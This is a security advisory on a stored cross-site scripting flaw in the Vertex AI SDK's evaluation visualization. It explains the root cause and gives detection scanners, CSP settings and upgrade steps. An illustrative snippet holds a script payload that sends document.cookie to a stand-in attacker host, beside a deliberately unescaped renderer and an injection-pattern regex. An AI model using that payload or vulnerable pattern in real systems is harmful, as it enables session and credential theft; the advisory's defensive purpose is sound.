CVE-2026-2472 Overview
A Stored Cross-Site Scripting (XSS) vulnerability exists in the _genai/_evals_visualization component of the Google Cloud Vertex AI SDK (google-cloud-aiplatform). The flaw affects versions from 1.98.0 up to (but not including) 1.131.0 and allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment by injecting script escape sequences into model evaluation results or dataset JSON data.
Critical Impact
Attackers can execute arbitrary JavaScript code in victims' Jupyter or Colab environments, potentially leading to data theft, session hijacking, or further compromise of machine learning workflows.
Affected Products
- Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions 1.98.0 to 1.130.x
- Jupyter Notebook environments using affected SDK versions
- Google Colab environments with vulnerable SDK installations
Discovery Timeline
- 2026-02-20 - CVE CVE-2026-2472 published to NVD
- 2026-02-23 - Last updated in NVD database
Technical Details for CVE-2026-2472
Vulnerability Analysis
This Stored XSS vulnerability (CWE-79) resides in the evaluation visualization component of Google Cloud's Vertex AI SDK. The _genai/_evals_visualization module fails to properly sanitize user-controlled input when rendering model evaluation results and dataset JSON data within interactive notebook environments.
When users work with Vertex AI's evaluation features in Jupyter notebooks or Google Colab, the SDK renders visualization outputs that include model evaluation metrics and dataset contents. The vulnerability arises because script escape sequences embedded within these data sources are not adequately escaped or sanitized before being rendered in the notebook's HTML output context.
The attack surface is particularly concerning because it targets machine learning practitioners who routinely process untrusted datasets and model outputs. An attacker can craft malicious JSON payloads containing JavaScript that executes when the victim views evaluation results.
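The vulnerable pattern can be illustrated with a hedged sketch. The field names and renderer below are hypothetical, not the SDK's actual schema or code; they only show how a payload stored in evaluation JSON survives into notebook HTML when values are interpolated verbatim:

```python
import json

# Hypothetical attacker-controlled evaluation record. The "explanation"
# field carries a script payload; field names are illustrative only.
evaluation_json = json.dumps({
    "metric": "groundedness",
    "explanation": "</td><script>fetch('https://attacker.example/?c='+document.cookie)</script>",
})

def render_unsafely(raw_json: str) -> str:
    """Naive renderer that trusts evaluation data (the vulnerable pattern)."""
    record = json.loads(raw_json)
    return f"<td>{record['metric']}</td><td>{record['explanation']}</td>"

html_out = render_unsafely(evaluation_json)
# The payload reaches the HTML output intact and would execute
# as soon as the notebook cell renders it.
assert "<script>" in html_out
```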
Root Cause
The root cause is improper input validation and insufficient output encoding in the _genai/_evals_visualization component. The SDK fails to sanitize script escape sequences present in model evaluation results or dataset JSON data before rendering them in HTML visualization components. This allows attackers to inject executable JavaScript that persists in the visualization output.
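The corrective pattern is context-aware output encoding: HTML-encode every data-derived value before interpolating it into markup. A minimal sketch, again with illustrative names rather than the SDK's actual fix:

```python
import html
import json

def render_safely(raw_json: str) -> str:
    """Encode every data-derived value before placing it in HTML."""
    record = json.loads(raw_json)
    cells = (html.escape(str(record[key])) for key in ("metric", "explanation"))
    return "".join(f"<td>{cell}</td>" for cell in cells)

payload = json.dumps({
    "metric": "groundedness",
    "explanation": "<script>alert(1)</script>",
})
out = render_safely(payload)
assert "<script>" not in out       # tag cannot execute
assert "&lt;script&gt;" in out     # it renders as inert text instead
```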
Attack Vector
The attack exploits the network-accessible nature of machine learning workflows. An attacker can inject malicious JavaScript payloads into model evaluation results or dataset JSON data that will later be processed by a victim using the vulnerable Vertex AI SDK. When the victim loads and visualizes this data in their Jupyter or Colab environment, the injected script executes within their browser context.
This is particularly dangerous in collaborative ML workflows where datasets and model outputs are shared between team members. The stored nature of this XSS means the malicious payload persists in the data and can affect multiple users who access the same resources.
The vulnerability does not require authentication for the attacker, though it does require user interaction (the victim must view the malicious visualization). Once triggered, the attacker can potentially access sensitive data within the notebook environment, steal authentication tokens, or manipulate ML workflows.
Detection Methods for CVE-2026-2472
Indicators of Compromise
- Unusual JavaScript patterns in model evaluation result files or dataset JSON containing <script> tags or event handlers
- Unexpected network requests originating from Jupyter or Colab notebooks to external domains
- Browser console errors or warnings related to Content Security Policy violations during visualization rendering
- Modified or tampered dataset JSON files with embedded script escape sequences
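The indicators above can be hunted with a simple scanner that walks dataset or evaluation JSON and flags string values containing script tags, inline event handlers, or javascript: URLs. The patterns below are a starting point, not an exhaustive filter, and will produce some false positives:

```python
import json
import re

# Heuristic patterns for common HTML/JS injection primitives.
SUSPICIOUS = re.compile(
    r"<\s*script|on\w+\s*=|javascript\s*:|<\s*iframe|srcdoc\s*=",
    re.IGNORECASE,
)

def find_suspicious_strings(node, path="$"):
    """Walk parsed JSON and yield (json_path, value) for suspect strings."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from find_suspicious_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_suspicious_strings(value, f"{path}[{i}]")
    elif isinstance(node, str) and SUSPICIOUS.search(node):
        yield path, node

sample = json.loads('{"rows": [{"answer": "<script>alert(1)</script>"}]}')
hits = list(find_suspicious_strings(sample))
# hits -> [("$.rows[0].answer", "<script>alert(1)</script>")]
```

Running such a scan over shared datasets before visualization gives an early warning that a file has been tampered with.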
Detection Strategies
- Implement static analysis scanning for JavaScript injection patterns in model evaluation outputs and datasets before visualization
- Monitor network traffic from notebook environments for suspicious outbound connections to unknown destinations
- Enable browser developer tools logging to detect unexpected script execution during visualization workflows
- Review audit logs for unusual data access patterns or modifications to shared datasets
Monitoring Recommendations
- Deploy endpoint detection and response (EDR) solutions capable of monitoring browser-based JavaScript execution within notebook environments
- Implement Content Security Policy (CSP) headers in Jupyter deployments to restrict unauthorized script execution
- Enable logging of all dataset imports and model evaluation result processing activities
- Configure alerting for anomalous data patterns in ML pipelines, particularly in shared or collaborative environments
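For the CSP recommendation, Jupyter Server exposes response headers through its Tornado settings. A hedged sketch of the relevant entry for `jupyter_server_config.py` (in the real config file, assign the dict to `c.ServerApp.tornado_settings`; the directives here are a starting point and must be tuned, since an overly strict policy can break notebook UI features):

```python
# Restrictive Content-Security-Policy for a Jupyter Server deployment.
# Each directive limits where injected scripts could load from or
# exfiltrate data to; adjust sources for your environment.
csp = "; ".join([
    "default-src 'self'",
    "script-src 'self'",       # refuse scripts from foreign origins
    "connect-src 'self'",      # block exfiltration to attacker domains
    "frame-ancestors 'self'",  # prevent the UI being framed elsewhere
])

# In jupyter_server_config.py:
#   c.ServerApp.tornado_settings = tornado_settings
tornado_settings = {"headers": {"Content-Security-Policy": csp}}
```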
How to Mitigate CVE-2026-2472
Immediate Actions Required
- Upgrade google-cloud-aiplatform SDK to version 1.131.0 or later immediately
- Audit all datasets and model evaluation results for potential injection payloads before visualization
- Implement input validation for any externally-sourced evaluation data or datasets
- Consider isolating ML visualization workflows to sandboxed environments until patches are applied
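To audit environments at scale, the affected range stated above (1.98.0 inclusive to 1.131.0 exclusive) can be checked programmatically. A minimal sketch using only the standard library; the naive parser assumes plain X.Y.Z release strings with no pre-release tags:

```python
from importlib.metadata import PackageNotFoundError, version

FIRST_AFFECTED = (1, 98, 0)
FIXED = (1, 131, 0)

def parse(v: str) -> tuple:
    # Naive parser; assumes plain "X.Y.Z" release strings.
    return tuple(int(part) for part in v.split(".")[:3])

def is_vulnerable(installed: str) -> bool:
    """True if the installed version falls in the advisory's affected range."""
    return FIRST_AFFECTED <= parse(installed) < FIXED

try:
    current = version("google-cloud-aiplatform")
    status = "VULNERABLE" if is_vulnerable(current) else "patched"
    print(f"google-cloud-aiplatform {current}: {status}")
except PackageNotFoundError:
    print("google-cloud-aiplatform is not installed")
```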
Patch Information
Google has addressed this vulnerability in version 1.131.0 of the google-cloud-aiplatform SDK. Users should upgrade to this version or later to receive the security fix. For detailed patch information, refer to the Google Cloud Security Bulletin.
Workarounds
- Avoid processing untrusted datasets or model evaluation results in Jupyter/Colab environments until upgraded
- Implement strict Content Security Policy headers in Jupyter deployments to prevent inline script execution
- Review and sanitize all JSON data inputs before using visualization features
- Use isolated virtual environments for processing potentially untrusted ML data
# Upgrade to patched version (quote the specifier so the shell
# does not treat ">" as output redirection)
pip install --upgrade "google-cloud-aiplatform>=1.131.0"
# Verify installed version
pip show google-cloud-aiplatform | grep Version


